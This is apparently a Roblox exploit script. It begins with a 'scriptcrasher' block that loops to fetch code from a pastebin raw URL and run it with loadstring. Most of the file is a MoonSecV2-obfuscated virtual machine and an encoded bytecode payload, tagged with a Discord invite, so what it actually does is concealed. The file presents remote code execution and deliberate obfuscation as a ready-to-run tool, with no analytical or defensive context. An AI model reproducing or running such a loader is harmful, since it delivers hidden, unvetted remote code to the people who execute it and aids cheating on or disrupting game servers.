spawn(function() --scriptcrasher
    getgenv().linkspammer1 = false
        while linkspammer1 do
            pcall(function()
                loadstring(game:HttpGet("https://pastebin.com/raw/4CHnND3T", true))()
            end)
        wait(1)
    end
end)


_, Protected_by_MoonSecV2, Discord = 'discord.gg/gQEH2uZxUk'


,nil,nil;(function() _msec=(function(l,e,o)local W=e[(195+-0x63)];local R=o[l[(1400-0x2ed)]][l[((1765-0x3ac)+-55)]];local c=(0x7d-121)/(((59045-0x7375)/152)/0x61)local x=(((-113+0x129)-0x93)+-35)-(-0x39+58)local m=o[l[(339-0xc2)]][l[(5901/0x15)]];local S=(0x47+(-0x32+(8-0x1c)))+(384/0xc0)local p=o[l[(641+-0x4f)]][l[(0x13860/98)]]local a=(78-0x4c)-((-0xb2-((0x87-130)+-0x50))+104)local O=((13064/((232760/0x5)/253))-0x44)local N=(447/(22350/(0x203a/(192-0x89))))local w=((((88+-0x44)-36)+496)/0xa0)local U=((0x4e9-((0x1c47894/179)/251))/199)local h=(606/(-46+(0x225-((0x565-720)-0x168))))local b=(0x46-(-0x78+(0xdc+(0x13-52))))local t=(-76+((0x108+(-0x2f+-61))+-78))local D=(0x7c/(0x94-(((269656/0x94)-0x3c2)/0xa)))local _=(86-(((0x47ed-9224)+-117)/0x6c))local f=(0x7e/((((375110-0x2dcc2)+-36)/0x30)/62))local u=(31+(-0x29b/(67-(0x49+-29))))local i=(-73+(-0x2c+((0x16a+-89)-0x9a)))local A=(0x38/(-0x24+(10400/(443-0xeb))))local G=(0x21c/(349-(0x1d3-(0x3d46/62))))local P=(((-82/(0x1e/15))+69)-24)local K=(((-1396560/(0xa3+(-67-0x4)))/220)+73)local s=(0x26-(680/((-0x26+(-0x56+271))-127)))local C=(0x4f+(((-212+0x5e)+-0x2cf3)/0x9b))local Y=l[((-93+0x3e6d)/12)];local Q=o[l[(-0x59+234)]][l[(-74+0x223)]];local V=o[(function(e)return type(e):sub(1,1)..'\101\116'end)(';+*_:}!.')..'\109\101'..('\116\97'or'!&##&=$_')..l[(0x254+-34)]];local k=o[l[(623+-0x3d)]][l[((-0x24+80955)/81)]];local g=(-40+0x2a)-(-79+(0x35ca/(0x178-206)))local v=((0x19a7/(0x6f29/143))-0x1f)-(-124+0x7e)local y=o[l[(0x4489/121)]][l[(351+-0x1d)]];local e=function(l,e)return l..e end local j=(70-0x42)*((-113+(0xf1-177))+53)local J=o[l[(0x91a-(0x514+-109))]];local n=(0x12/9)*(((894+-0x5a)-426)-250)local L=((7249+-0x51)/7)*((0x50dc/(5796/0x7e))/225)local I=(11336/((-2576/0x2e)+274))local M=(((0x6f2698/244)/0xfd)/0x3b)*(0x184/194)local B=o[l[(0x2cf2e/170)]]or o[l[(74184/0x84)]][l[(0x2cf2e/170)]];local r=(0x239-(17841/(74+-0x11)))local l=o[l[(2655-0x565)]];local p=(function(n)local r,o=1,0x10 local l={j={},v={}}local d=-a local e=o+x while true do l[n:sub(e,(function()e=r+e return e-x end)())]=(function()d=d+a return d end)()if d==(j-a)then d=""o=g break end end local d=#n while e<d+x do l.v[o]=n:sub(e,(function()e=r+e return e-x end)())o=o+a if o%c==g then o=v k(l.j,(y((l[l.v[v]]*j)+l[l.v[a]])))end end return p(l.j)end)("..:::MoonSec::..!*%&/+^,;.:_#$}==+$$_&.%,*^%&_!}}$##!*}}#:;}^$+.&+!}!,}^_^_!=$==$$_#._$.=&/$*,=^$+*;=#}+_/.=;*+%=_*&=%.._!,./#%}=,*.$$$:.^;_..}+_$.#,_:%:$;#^,*$*:!;.^+#&**!}=%$!#==$!:$.},:/#%_*^;+^_/%%*!!%+!%}/#%_+:!;!+#;%_:.+,/+&..,%+$&/*+.,^#/_%:,++,%;!:=;$;_+;_^=/,^:=:,$+#&_;%^$/#%,!.:=;&^%;/+%/,$$=+$^#!.&,=/_&$*:}_$,:,.%,!++%+!$=%;_.=;:^,!;%+*!}%_^.;;%+_//*%=;$+,#..;!+^%:!#=^#=_;.^^;/&%$!#=;#!:^;&%:/,*:!*}+;+:%;$+=&&*+==$;#*.=,*/#&^*+!*#.:=;#,,/;%+*!}}#&+%*$=#$__#:_,;+,&^*+=/$&_%:&.,/=%}!$=*#_::;.^;/,%^!+}/#&:%;*^!&=*}=$$$__.:,.+;&,%;=+$/_/.%,%+!%=!}==##:_;_^./:%,!^}+}::&;%^%/!%;=}$}_#.},:+$^+*,=^$+_$.&,&+*&!*#}}#$:#;#^:/.%;!.=;#+:+;&^&/*%!===!#!.#,#+:&=*;=,$^#,./,&+&&**;}=#}:$.}^_/:%_!;}}#^:+;/;&/%%*!%$=#!.$;!+_/#*.=;$__^.},/+&&%**=!#=_&;$^$/_%:!.};#,:^;,^//;%%!*}!_=.},$+$&_*:=.$:_,.^,++/&/*%=%$!_!;}^$/#%_!:}.#.:,;^^+/^%&!%}*#%:*,}+$&#+%=:$._;.,,^++&/*&*+$^_!;=^}_$;=^#+^&+#^;,^^/+&^/;}%#&:!;!+}&$*#!$*=_.._,,+,&+*/=&}/_=.!,&/}%=!#}_#::=;=^,/_%+!/}&#&:*;/+=&}+!=#$__:._,;+,&^*+%,$&_%.*,!/=%}!$}#=}::;.^;/:%^!+}/#&$+;*^!&=*==$$#__.:_&+;&_*^=,$/_/.%,,;_%=!}}$$;:_;_^./.%,!:*%#/:&;%^$/!%!=}}*}.._,:+.+%*,=,$+_:#/,%+*&!%.}}#}:#;#^:/$++!,}^#+_};&^&/*%^&:$}_}.#;#+:&:*;=,$^_.#*,&+%&*%*}=#=:$.!.;/:%.!;!*#^:^;/^&^}%*!/$=#!.$,=+_&:/+=;$#_^.;,/++&%*,%*#=_%;$;^/_%_!.}$#,::_%^//&%%*_}!#!.},$;;&_*}=.$:_,..,++/+=*%=^$!_%;}^=/#&*&_}.##:,:!^+/+%&!,}*#/##,}+$&#&+=:$:_;._:&++&/*&!$$*_*;=^};}%#!=}:#.:;;,^^/+/:!&}^#*:*,=+}&$*#!&$:_$.;,.+^&+*/=&$=_*.!^=/=%$!#}_#_:.;;^,/^%+!/}&#%:;;!+=&}*$!*$__:..,.+,&^*+=/$&_%.*,!/=%}!$}##_::;.^;/,%^!+}/#&:%;*^!&=*}!!$#__.:,.+;&,*^=+$/_&.%,*+!%=!}}$##:$;:^./;%,!^}+#/:&;&^*/!*==}$$_#._,$^*&;*,=^*:_:.&,%+*:&;&^!&^*:=%:=/$%;!,}^%,*$=,#,^/%#==$}_$=%$=__,=+}/:%^===;$,:,:*#=}=#}:$;#^_/:*./,_/#::+;/^&:+;.^*+*+;.$,#+_&:;!=_$,_^.+},#;./.$=!#=:};$^#/_.:/.!:#,:^;+,^+*%%!/}!#%.},$+#&_%_=.$__,..,+++&&*;=$$!_%;},%/#%#!:}:#;:__&^+//%&!,}*#*.=;%;:&#*_=:}*_;.;,^^,/%*&=+$*_&;=^}/$%#*#}:##:;;:^^/^%/!&}:#*:&,=^!&$*#=_}#=}.;,:+^&.*/=&$%#&:=^=+%%$*%}_#::..:^,/^%:!/},#%:*;!+=&}*$!%$__:..,;+,/;*+=/$:_%.+,!/=%}**}##_:=;.;^/,%,!+}/$#:%;:^!/&*}=$$##$_/,.^%&,*,=+$/_&_%,*+!&.!}=,##_!;:;./;%,**}+#/:&;.^*/!*==}}:_#:&,:+.&;*,=^$+#%.&,:+*&!!=}}#$:#.^^:+,%;!.}^}+:/;&^$/*%_==}!_$.#,_+://*;=.$^_,./,&+%&**_}=$.:$;=^_^:%.!;=%#^_!;/^_/%%*!!$=#;.$,}+_&#*.=;$,_^..,/+#&%*_=!#=:};$,+/_%$!.}:#,#^;+^//^%%!:}!#,.};*,:&_*==.}^_,.,,+^^/**%=^$!_%;}^$/#%_/}}.#$:,;,^+/;%&!%}.#!:&,}+=&#*_=:$.#+.,,^++&+*&=%$*_!;=^}/$");local k=(90-0x39)local o=11 local d=a;local l={}l={[(0x13+-18)]=function()local l,x,e,a=m(p,d,d+S);d=d+M;o=(o+(k*M))%r;return(((a+o-(k)+n*(M*c))%n)*((c*L)^c))+(((e+o-(k*c)+n*(c^S))%r)*(n*r))+(((x+o-(k*S)+L)%r)*n)+((l+o-(k*M)+L)%r);end,[(292/0x92)]=function(e,e,e)local e=m(p,d,d);d=d+x;o=(o+(k))%r;return((e+o-(k)+L)%n);end,[(0x55+-82)]=function()local e,l=m(p,d,d+c);o=(o+(k*c))%r;d=d+c;return(((l+o-(k)+n*(c*M))%n)*r)+((e+o-(k*c)+r*(c^S))%n);end,[(95-0x5b)]=function(l,e,o)if o then local e=(l/c^(e-a))%c^((o-x)-(e-a)+x);return e-e%a;else local e=c^(e-x);return(l%(e+e)>=e)and a or v;end;end,[(-48+0x35)]=function()local o=l[(44-0x2b)]();local e=l[(-0x34+53)]();local i=a;local d=(l[(0x3c/15)](e,x,j+M)*(c^(j*c)))+o;local o=l[(0x32c/203)](e,21,31);local e=((-a)^l[(49+-0x2d)](e,32));if(o==v)then if(d==g)then return e*v;else o=x;i=g;end;elseif(o==(n*(c^S))-x)then return(d==v)and(e*(x/g))or(e*(v/g));end;return R(e,o-((r*(M))-a))*(i+(d/(c^I)));end,[(1506/0xfb)]=function(e,c,c)local c;if(not e)then e=l[(2/0x2)]();if(e==v)then return'';end;end;c=Q(p,d,d+e-a);d=d+e;local e=''for l=x,#c do e=Y(e,y((m(Q(c,l,l))+o)%r))o=(o+k)%n end return e;end}local function p(...)return{...},J('#',...)end local function L()local k={};local h={};local e={};local _={k,h,nil,e};local o={}local f=((646-0x167)-190)local n={[(146/0x49)]=(function(e)return not(#e==l[(-0x79+123)]())end),[(0x210/132)]=(function(e)return l[(124+-0x77)]()end),[(81-0x50)]=(function(e)return l[(0x6d-103)]()end),[(59-0x3b)]=(function(e)local d=l[(-84+0x5a)]()local l=''local e=1 for o=1,#d do e=(e+f)%r l=Y(l,y((m(d:sub(o,o))+e)%n))end return l end)};_[3]=l[(0x61+-95)]();local e=l[(0x38-(0xe8-177))]()for d=1,e do local e=l[(0x30+(-0x4da/27))]();local l;local e=n[e%(-0x78+137)];o[d]=e and e({});end;for _=1,l[(145/0x91)]()do local e=l[(91-0x59)]();if(l[((73-0x33)+-0x12)](e,a,x)==g)then local r=l[(82-0x4e)](e,c,S);local d=l[(880/0xdc)](e,M,c+M);local e={l[(0xf6/82)](),l[(0x4a+-71)](),nil,nil};local n={[(-0x50+80)]=function()e[O]=l[(0x5d+-90)]();e[P]=l[((0x124-164)-125)]();end,[(0x7a/122)]=function()e[b]=l[(0x63+-98)]();end,[(-94+(0xe40/38))]=function()e[U]=l[(0x2f-46)]()-(c^j)end,[(-84+0x57)]=function()e[U]=l[(76-0x4b)]()-(c^j)e[K]=l[(-113+0x74)]();end};n[r]();if(l[(0x31-45)](d,x,a)==x)then e[t]=o[e[i]]end if(l[((-0x20+127)+-0x5b)](d,c,c)==a)then e[w]=o[e[w]]end if(l[(0x32-46)](d,S,S)==x)then e[s]=o[e[P]]end k[_]=e;end end;for e=x,l[(0x36+-53)]()do h[e-x]=L();end;return _;end;local function v(l,M,k)local d=l[c];local L=l[S];local l=l[a];return(function(...)local r=l;local l=a l*=-1 local S=l;local o={};local n={...};local m=p local j={};local p=J('#',...)-x;local g=d;local y={};local l=L;local d=a;for e=0,p do if(e>=l)then y[e-l]=n[e+x];else o[e]=n[e+a];end;end;local l=p-l+a local l;local n;while true do l=r[d];n=l[(0xe2/226)];e=(1925968)while(0x1950/180)>=n do e-= e e=(8386307)while n<=(129+-0x70)do e-= e e=(3318290)while(-82+0x5a)>=n do e-= e e=(5035423)while((762-0x1a4)/114)>=n do e-= e e=(992727)while(0x7f-126)>=n do e-= e e=(131967)while n>(0/0x12)do e-= e if(o[l[_]]==o[l[C]])then d=d+x;else d=l[O];end;break end while(e)/((196+-0x67))==1419 do local e=l[_]o[e]=o[e](B(o,e+a,S))break end;break;end while(e)/((317310/0xd2))==657 do e=(5976504)while(-0x4a+76)<n do e-= e local n;local c,w;local x;local e;k[l[O]]=o[l[t]];d=d+a;l=r[d];o[l[i]]=k[l[U]];d=d+a;l=r[d];o[l[_]]=k[l[h]];d=d+a;l=r[d];e=l[u];x=o[l[h]];o[e+1]=x;o[e]=x[l[C]];d=d+a;l=r[d];o[l[_]]=l[O];d=d+a;l=r[d];o[l[t]]=(l[O]~=0);d=d+a;l=r[d];e=l[t]c,w=m(o[e](B(o,e+1,l[b])))S=w+e-1 n=0;for e=e,S do n=n+a;o[e]=c[n];end;d=d+a;l=r[d];e=l[_]o[e]=o[e](B(o,e+a,S))d=d+a;l=r[d];o[l[_]]();d=d+a;l=r[d];do return end;break end while(e)/((0x1d7a-3820))==1604 do if(o[l[f]]~=l[s])then d=d+x;else d=l[w];end;break end;break;end break;end while(e)/((0xf8f+-46))==1279 do e=(10035762)while(0x42-61)>=n do e-= e e=(11349432)while(176/0x2c)<n do e-= e o[l[f]]=M[l[h]];d=d+a;l=r[d];o[l[_]]=#o[l[w]];d=d+a;l=r[d];M[l[b]]=o[l[i]];d=d+a;l=r[d];o[l[D]]=M[l[h]];d=d+a;l=r[d];o[l[u]]=#o[l[U]];d=d+a;l=r[d];M[l[w]]=o[l[D]];d=d+a;l=r[d];do return end;break end while(e)/((0x1ab1-3437))==3342 do o[l[t]]=o[l[O]]%l[A];break end;break;end while 3498==(e)/((-89+0xb8e))do e=(718368)while n<=(0x3a8/156)do e-= e local e=l[i];local a=o[e+2];local n=o[e]+a;o[e]=n;if(a>0)then if(n<=o[e+1])then d=l[O];o[e+3]=n;end elseif(n>=o[e+1])then d=l[O];o[e+3]=n;end break;end while 1069==(e)/((1376-0x2c0))do e=(10648770)while n>(-124+0x83)do e-= e do return o[l[i]]end break end while(e)/((707112/0xfc))==3795 do local c=g[l[U]];local a;local e={};a=V({},{__index=function(o,l)local e=e[l];return e[1][e[2]];end,__newindex=function(d,o,l)local e=e[o]e[1][e[2]]=l;end;});for n=1,l[P]do d=d+x;local l=r[d];if l[(0x77+-118)]==51 then e[n-1]={o,l[b]};else e[n-1]={M,l[h]};end;j[#j+1]=e;end;o[l[i]]=v(c,a,k);break end;break;end break;end break;end break;end while(e)/((0xd40-1722))==1987 do e=(7026656)while n<=(42-0x1e)do e-= e e=(2996658)while n<=(0x31+-39)do e-= e e=(1581316)while n>(522/0x3a)do e-= e o[l[t]]=(l[w]~=0);d=d+x;break end while(e)/((-28+0x37e))==1826 do o[l[D]]=v(g[l[h]],nil,k);break end;break;end while(e)/((0x2dc21/(0x1c9-282)))==2798 do e=(8286684)while n>(-0x74+127)do e-= e if not o[l[f]]then d=d+x;else d=l[w];end;break end while(e)/((-0x30+2547))==3316 do o[l[_]]=M[l[b]];break end;break;end break;end while(e)/((51870/0x1e))==4064 do e=(2996081)while(75+(3+-0x40))>=n do e-= e e=(617283)while n>(0x38-43)do e-= e o[l[f]]=k[l[O]];break end while(e)/((0x386d/(141-0x7e)))==641 do do return end;break end;break;end while 1331==(e)/((0x587ab/(391-0xe6)))do e=(10260336)while((5173-0xa30)/171)>=n do e-= e o[l[f]]=o[l[b]][l[G]];break;end while(e)/((0x1cc2-3739))==2832 do e=(1484539)while(-0x46+(-34+0x78))<n do e-= e o[l[i]]=o[l[N]][o[l[P]]];break end while 2059==(e)/((-0x35+774))do o[l[_]]=M[l[w]];break end;break;end break;end break;end break;end break;end while 4073==(e)/((0x77a3a/238))do e=(4567378)while n<=(0x85-107)do e-= e e=(2979800)while(-105+0x7e)>=n do e-= e e=(12465764)while(-0x64+119)>=n do e-= e e=(2204202)while(0x59+-71)<n do e-= e local e=l[i]o[e]=o[e](o[e+x])break end while 546==(e)/(((171318/0x15)-4121))do o[l[i]]=v(g[l[O]],nil,k);break end;break;end while(e)/((71714/0x17))==3998 do e=(12232014)while n>(1340/0x43)do e-= e local d=l[h];local e=o[d]for l=d+1,l[s]do e=e..o[l];end;o[l[i]]=e;break end while(e)/((0xef4+-101))==3282 do do return end;break end;break;end break;end while(e)/((1940+-0x3c))==1585 do e=(13073088)while(598/0x1a)>=n do e-= e e=(2253860)while n>(149+-0x7f)do e-= e if(o[l[i]]~=o[l[A]])then d=d+x;else d=l[h];end;break end while 947==(e)/((440300/0xb9))do M[l[N]]=o[l[_]];break end;break;end while(e)/((-0x4d+3913))==3408 do e=(203236)while n<=(-26+0x32)do e-= e o[l[i]][o[l[b]]]=o[l[P]];break;end while 1639==(e)/((3968/0x20))do e=(11068200)while n>(6275/0xfb)do e-= e local D;local n;local M;local e;o[l[u]]=k[l[h]];d=d+a;l=r[d];o[l[i]]=o[l[O]][l[C]];d=d+a;l=r[d];e=l[i];M=o[l[w]];o[e+1]=M;o[e]=M[l[s]];d=d+a;l=r[d];o[l[i]]=o[l[h]];d=d+a;l=r[d];o[l[_]]=o[l[N]];d=d+a;l=r[d];e=l[_]o[e]=o[e](B(o,e+a,l[h]))d=d+a;l=r[d];e=l[t];M=o[l[b]];o[e+1]=M;o[e]=M[l[C]];d=d+a;l=r[d];e=l[f]o[e]=o[e](o[e+x])d=d+a;l=r[d];n={o,l};n[x][n[c][t]]=n[a][n[c][C]]+n[x][n[c][b]];d=d+a;l=r[d];o[l[f]]=o[l[U]]%l[P];d=d+a;l=r[d];e=l[t]o[e]=o[e](o[e+x])d=d+a;l=r[d];M=l[b];D=o[M]for e=M+1,l[C]do D=D..o[e];end;o[l[u]]=D;d=d+a;l=r[d];n={o,l};n[x][n[c][_]]=n[a][n[c][K]]+n[x][n[c][w]];d=d+a;l=r[d];o[l[t]]=o[l[w]]%l[A];break end while 2838==(e)/((3971+-0x47))do o[l[u]]=o[l[h]];break end;break;end break;end break;end break;end while 1418==(e)/((0xb4dde/230))do e=(2282112)while(125-0x5e)>=n do e-= e e=(1165514)while n<=(56+-0x1c)do e-= e e=(2242720)while(0x6a5/(0xa0-97))<n do e-= e local e=l[f]o[e]=o[e](B(o,e+a,l[w]))break end while 2096==(e)/(((0x37a80/208)+-26))do local d=l[D];local e=o[l[w]];o[d+1]=e;o[d]=e[l[G]];break end;break;end while 686==(e)/((0xd81-1758))do e=(6909562)while n<=(0x227/19)do e-= e o[l[i]]=o[l[O]][l[s]];break;end while 2794==(e)/((0x3351d/85))do e=(211437)while n>(0x5e-64)do e-= e local x;local n;local e;o[l[t]]=l[h];d=d+a;l=r[d];o[l[_]]=l[N];d=d+a;l=r[d];o[l[f]]=#o[l[w]];d=d+a;l=r[d];o[l[f]]=l[N];d=d+a;l=r[d];e=l[D];n=o[e]x=o[e+2];if(x>0)then if(n>o[e+1])then d=l[U];else o[e+3]=n;end elseif(n<o[e+1])then d=l[h];else o[e+3]=n;end break end while(e)/((0x5133/169))==1719 do local e=l[u];local a=o[e+2];local n=o[e]+a;o[e]=n;if(a>0)then if(n<=o[e+1])then d=l[U];o[e+3]=n;end elseif(n>=o[e+1])then d=l[b];o[e+3]=n;end break end;break;end break;end break;end while(e)/((-0x58+2352))==1008 do e=(3399765)while n<=(0xd05/101)do e-= e e=(6944857)while((0x227-327)/0x7)<n do e-= e local e=l[D];local n=o[e]local a=o[e+2];if(a>0)then if(n>o[e+1])then d=l[U];else o[e+3]=n;end elseif(n<o[e+1])then d=l[U];else o[e+3]=n;end break end while 2939==(e)/((0x12ab-2416))do local e={o,l};e[x][e[c][i]]=e[a][e[c][P]]+e[x][e[c][b]];break end;break;end while(e)/((291194/0xc2))==2265 do e=(4206321)while n<=(0x58+-54)do e-= e local e=l[i]local d,l=m(o[e](B(o,e+1,l[U])))S=l+e-1 local l=0;for e=e,S do l=l+a;o[e]=d[l];end;break;end while 2611==(e)/((-0x1d+(-73+0x6b1)))do e=(7577260)while n>(0x8b+-104)do e-= e local e=l[i]o[e]=o[e](B(o,e+a,l[w]))break end while(e)/((-0x46+2340))==3338 do o[l[D]]=l[h];break end;break;end break;end break;end break;end break;end break;end while 2728==(e)/((0x5ec-810))do e=(10239619)while(212-(404-0xf7))>=n do e-= e e=(5011443)while(-0x4f+124)>=n do e-= e e=(8462916)while n<=(162+-0x7a)do e-= e e=(7839410)while(1710/0x2d)>=n do e-= e e=(7673952)while n>(149-(0x107-151))do e-= e o[l[i]]=(l[U]~=0);break end while(e)/(((0x29c37c0/110)/0xae))==3354 do o[l[u]]={};break end;break;end while 3170==(e)/((0x9cb+-34))do e=(7521184)while((0xc418/251)-0xa1)<n do e-= e local c=g[l[b]];local a;local e={};a=V({},{__index=function(o,l)local e=e[l];return e[1][e[2]];end,__newindex=function(d,l,o)local e=e[l]e[1][e[2]]=o;end;});for n=1,l[s]do d=d+x;local l=r[d];if l[(0x24-35)]==51 then e[n-1]={o,l[b]};else e[n-1]={M,l[b]};end;j[#j+1]=e;end;o[l[_]]=v(c,a,k);break end while 2024==(e)/((7461-0xea1))do k[l[N]]=o[l[_]];d=d+a;l=r[d];o[l[i]]={};d=d+a;l=r[d];o[l[f]]={};d=d+a;l=r[d];k[l[O]]=o[l[_]];d=d+a;l=r[d];o[l[u]]=k[l[h]];d=d+a;l=r[d];if(o[l[u]]~=l[s])then d=d+x;else d=l[b];end;break end;break;end break;end while(e)/(((-0x5a+5695)-0xb11))==3053 do e=(2586331)while(0x85+-91)>=n do e-= e e=(6046769)while n>(193-0x98)do e-= e local e=l[i];local n=o[e]local a=o[e+2];if(a>0)then if(n>o[e+1])then d=l[w];else o[e+3]=n;end elseif(n<o[e+1])then d=l[O];else o[e+3]=n;end break end while 3151==(e)/((3897-0x7ba))do local e={o,l};e[x][e[c][u]]=e[a][e[c][P]]+e[x][e[c][h]];break end;break;end while 2101==(e)/((0x3d4f4/204))do e=(4225500)while n<=(204-0xa1)do e-= e local e=l[_]local d,l=m(o[e](B(o,e+1,l[w])))S=l+e-1 local l=0;for e=e,S do l=l+a;o[e]=d[l];end;break;end while 1350==(e)/((0x18ef-3253))do e=(1549400)while n>(0xf20/88)do e-= e d=l[b];break end while(e)/((1106+-0x5a))==1525 do o[l[i]]=o[l[O]]-o[l[K]];break end;break;end break;end break;end break;end while 2817==(e)/((-112+0x763))do e=(57820)while(6000/0x78)>=n do e-= e e=(3633852)while(-32+0x4f)>=n do e-= e e=(6998412)while n>((0x1a6-255)+-0x79)do e-= e if not o[l[_]]then d=d+x;else d=l[O];end;break end while(e)/((3936-0x7d7))==3628 do k[l[h]]=o[l[D]];break end;break;end while 1598==(e)/(((0x69c08/182)+-106))do e=(2549484)while n<=(131-0x53)do e-= e d=l[w];break;end while(e)/((608832/0xc0))==804 do e=(8588995)while(82+-0x21)<n do e-= e if(o[l[D]]~=l[A])then d=d+x;else d=l[N];end;break end while(e)/((-127+0xcc8))==2731 do if(o[l[i]]==o[l[A]])then d=d+x;else d=l[N];end;break end;break;end break;end break;end while(e)/((0x1aa-230))==295 do e=(3433668)while(0xc6-146)>=n do e-= e e=(3417066)while(130-(0xb5-102))<n do e-= e o[l[t]]=#o[l[w]];break end while(e)/((0x111f-2250))==1602 do o[l[i]]=o[l[h]];break end;break;end while(e)/((8098-0x100e))==861 do e=(520000)while n<=(0x1cc7/139)do e-= e o[l[i]]=o[l[b]][o[l[P]]];break;end while(e)/((0x1770/12))==1040 do e=(719890)while((0xf4-167)+-0x17)<n do e-= e o[l[u]]=(l[U]~=0);break end while(e)/((1538-0x318))==965 do local d=l[b];local e=o[d]for l=d+1,l[C]do e=e..o[l];end;o[l[_]]=e;break end;break;end break;end break;end break;end break;end while 2743==(e)/((0x1d58-3779))do e=(3052167)while(0x2140/133)>=n do e-= e e=(7002810)while n<=(-0x3e+(0x1545/45))do e-= e e=(12212057)while((497-0x12e)-0x8a)>=n do e-= e e=(10860168)while n>(165-0x6d)do e-= e o[l[i]]=k[l[O]];break end while(e)/((0x15a0-2808))==3981 do local e=l[D]o[e](o[e+x])break end;break;end while 3289==(e)/((0x5365c/92))do e=(5038802)while(0xc6-140)<n do e-= e if(o[l[_]]~=o[l[C]])then d=d+x;else d=l[b];end;break end while 2077==(e)/((0x49718/124))do local e=l[i]o[e](o[e+x])break end;break;end break;end while 1990==(e)/((56304/0x10))do e=(14049817)while n<=(173-0x70)do e-= e e=(3538062)while(-96+0x9c)<n do e-= e local d=l[u];local e=o[l[b]];o[d+1]=e;o[d]=e[l[C]];break end while(e)/((2045-0x43a))==3674 do o[l[_]]=o[l[h]]-o[l[C]];break end;break;end while 3677==(e)/((0x1e06-3865))do e=(640940)while(-59+0x79)>=n do e-= e o[l[i]]=#o[l[U]];break;end while 730==(e)/((-119+0x3e5))do e=(2459229)while(0x69+-42)<n do e-= e do return o[l[f]]end break end while 667==(e)/((0x1d02-(7512-0xebd)))do o[l[u]]();break end;break;end break;end break;end break;end while 887==(e)/((0x1b0f-(0x3751e/65)))do e=(2958038)while n<=(-104+0xad)do e-= e e=(7433400)while(-0x4c+142)>=n do e-= e e=(3481172)while(-64+0x81)<n do e-= e o[l[f]]={};break end while(e)/((-0x67+1941))==1894 do o[l[t]]=(l[w]~=0);d=d+x;break end;break;end while(e)/((0x32f43/73))==2600 do e=(9577820)while n<=(15343/(0x106+-33))do e-= e M[l[h]]=o[l[f]];break;end while 3010==(e)/(((12894-0x1965)-3211))do e=(2460252)while n>(157+-0x59)do e-= e o[l[t]]=l[U];break end while 3361==(e)/((0x5fd-801))do o[l[f]][o[l[U]]]=o[l[s]];break end;break;end break;end break;end while(e)/((0xc15+-56))==974 do e=(2110264)while n<=(0x59+-18)do e-= e e=(5879185)while(-0x70+182)<n do e-= e o[l[_]]=o[l[U]]%l[G];break end while(e)/((200665/0x43))==1963 do k[l[N]]=o[l[t]];break end;break;end while(e)/((5451-0xad5))==788 do e=(7862199)while(0x360/12)>=n do e-= e local e=l[i]o[e]=o[e](o[e+x])break;end while(e)/((-0x43+3358))==2389 do e=(65625)while(0xcb-130)<n do e-= e local e=l[i]o[e]=o[e](B(o,e+a,S))break end while 1875==(e)/((84+-0x31))do o[l[i]]();break end;break;end break;end break;end break;end break;end break;end d+= x end;end);end;return v(L(),{},W())()end)_msec({[(0x15a-201)]='\115\116'..(function(e)return(e and'(122+-0x16)')or'\114\105'or'\120\58'end)((0x4e+-73)==(0x2d+-39))..'\110g',[((1765-0x3ac)+-55)]='\108\100'..(function(e)return(e and'(261-0xa1)')or'\101\120'or'\119\111'end)((-0x35+(173-0x73))==(0x3f6/169))..'\112',[(5901/0x15)]=(function(e)return(e and'(-43+0x8f)')and'\98\121'or'\100\120'end)((0x23f/115)==(0x79+-116))..'\116\101',[(351+-0x1d)]='\99'..(function(e)return(e and'(0x13b-215)')and'\90\19\157'or'\104\97'end)((136-0x83)==(0x42+(-86+0x17)))..'\114',[(597+-0x23)]='\116\97'..(function(e)return(e and'(-67+(29726/0xb2))')and'\64\113'or'\98\108'end)((-0x7f+133)==(0x1e+-25))..'\101',[(-74+0x223)]=(function(e)return(e and'(10100/0x65)')or'\115\117'or'\78\107'end)((0x42/22)==(-0x5a+121))..'\98',[(0x13860/98)]='\99\111'..(function(e)return(e and'(170+-0x46)')and'\110\99'or'\110\105\103\97'end)((116+-0x55)==(0x6e+-79))..'\97\116',[(683+-0x20)]=(function(e,l)return(e and'(176+-0x4c)')and'\48\159\158\188\10'or'\109\97'end)((90-0x55)==(-0x1f+37))..'\116\104',[(-27+0x547)]=(function(l,e)return((-0x36+59)==(0x1b+-24)and'\48'..'\195'or l..((not'\20\95\69'and'\90'..'\180'or e)))or'\199\203\95'end),[((-0x24+80955)/81)]='\105\110'..(function(e,l)return(e and'(326-0xe2)')and'\90\115\138\115\15'or'\115\101'end)((0x82+-125)==(179-0x94))..'\114\116',[(0x2cf2e/170)]='\117\110'..(function(e,l)return(e and'((0x133+-122)+-85)')or'\112\97'or'\20\38\154'end)((95+-0x5a)==(82-0x33))..'\99\107',[(0x91a-(0x514+-109))]='\115\101'..(function(e)return(e and'(123+-0x17)')and'\110\112\99\104'or'\108\101'end)((74+-0x45)==(0x3ff/33))..'\99\116',[(2655-0x565)]='\116\111\110'..(function(e,l)return(e and'(0x21fc/87)')and'\117\109\98'or'\100\97\120\122'end)((0x43d/217)==(35-0x1e))..'\101\114'},{[(268-0xac)]=((getfenv))},((getfenv))()) end)()


